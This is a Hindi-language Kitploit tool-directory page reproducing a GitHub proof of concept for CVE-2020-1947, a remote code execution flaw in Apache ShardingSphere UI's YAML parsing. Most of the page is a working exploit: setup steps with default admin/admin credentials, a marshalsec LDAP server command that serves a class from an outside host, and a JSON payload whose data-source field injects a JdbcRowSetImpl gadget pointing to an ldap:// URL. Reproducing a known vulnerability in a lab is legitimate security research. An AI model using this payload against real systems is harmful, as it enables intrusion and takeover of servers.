Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-1947 — Apache ShardingSphere UI YAML पार्सिंग रिमोट कोड निष्पादन भेद्यता | Kitploit
उपकरण/GitHubGitHub/jas502n/cve-2020-1947
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubjas502n/cve-2020-1947

CVE-2020-1947

Apache ShardingSphere UI YAML पार्सिंग रिमोट कोड निष्पादन भेद्यता

रिपॉजिटरी देखें
311266 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-1947 Apache ShardingSphere UI YAML विश्लेषण दूरस्थ कोड निष्पादन भेद्यता पुनरुत्पादन

0x01 शार्डिंगस्फीयर बाइनरी पैकेज डाउनलोड करें

wget https://mirror-hk.koddos.net/apache/incubator/shardingsphere/4.0.0/apache-shardingsphere-incubating-4.0.0-sharding-ui-bin.tar.gz

अनज़िप करें

[root@kali]# tar -xf apache-shardingsphere-incubating-4.0.0-sharding-ui-bin.tar.gz 
[root@kali]# ll
total 23064
drwxr-xr-x 6 root root      103 Feb 28 15:23 apache-shardingsphere-incubating-4.0.0-sharding-ui-bin

प्रोग्राम डायरेक्टरी में प्रवेश करें और चलाएँ

[root@kali]# cd apache-shardingsphere-incubating-4.0.0-sharding-ui-bin
[root@kali]# bin/start.sh

sharding-ui एक मानक springboot प्रोग्राम है, conf/application.properties के माध्यम से संबंधित जानकारी कॉन्फ़िगर की जा सकती है

#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

server.port=8088

user.admin.username=admin
user.admin.password=admin

पोर्ट, उपयोगकर्ता नाम और पासवर्ड यहाँ संशोधित किए जा सकते हैं

0x02 कॉन्फ़िगरेशन और उपयोग

अपने सर्वर के आईपी पते:8088 दर्ज करें और प्रबंधन इंटरफ़ेस में प्रवेश करें।

डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड हैं: admin/admin

रजिस्ट्री केंद्र का पता zookeeper पता है: 127.0.0.1:2181 प्रारूप में

0x03 RCE के लिए डेटा पोस्ट करें

ldap

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.10.20.166:8000/#ExportObject

http://10.10.20.166:8088/api/schema

Poc:

{
  "name": "CVE-2020-1947",
  "ruleConfiguration": "  encryptors:\n    encryptor_aes:\n      type: aes\n      props:\n        aes.key.value: 123456abc\n    encryptor_md5:\n      type: md5\n  tables:\n    t_encrypt:\n      columns:\n        user_id:\n          plainColumn: user_plain\n          cipherColumn: user_cipher\n          encryptor: encryptor_aes\n        order_id:\n          cipherColumn: order_cipher\n          encryptor: encryptor_md5",
  "dataSourceConfiguration": "!!com.sun.rowset.JdbcRowSetImpl\n  dataSourceName: ldap://127.0.0.1:1389/ExportObject\n  autoCommit: true"
}
टूल डाउनलोड करें